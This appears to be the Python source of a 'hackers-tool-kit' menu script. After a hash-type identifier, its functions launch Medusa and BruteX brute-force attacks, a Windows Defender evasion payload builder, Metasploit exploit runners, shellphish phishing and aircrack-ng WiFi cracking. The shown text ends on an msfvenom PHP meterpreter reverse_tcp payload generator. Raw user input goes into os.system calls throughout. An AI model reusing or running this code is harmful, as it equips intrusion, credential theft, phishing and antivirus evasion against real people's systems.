and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - 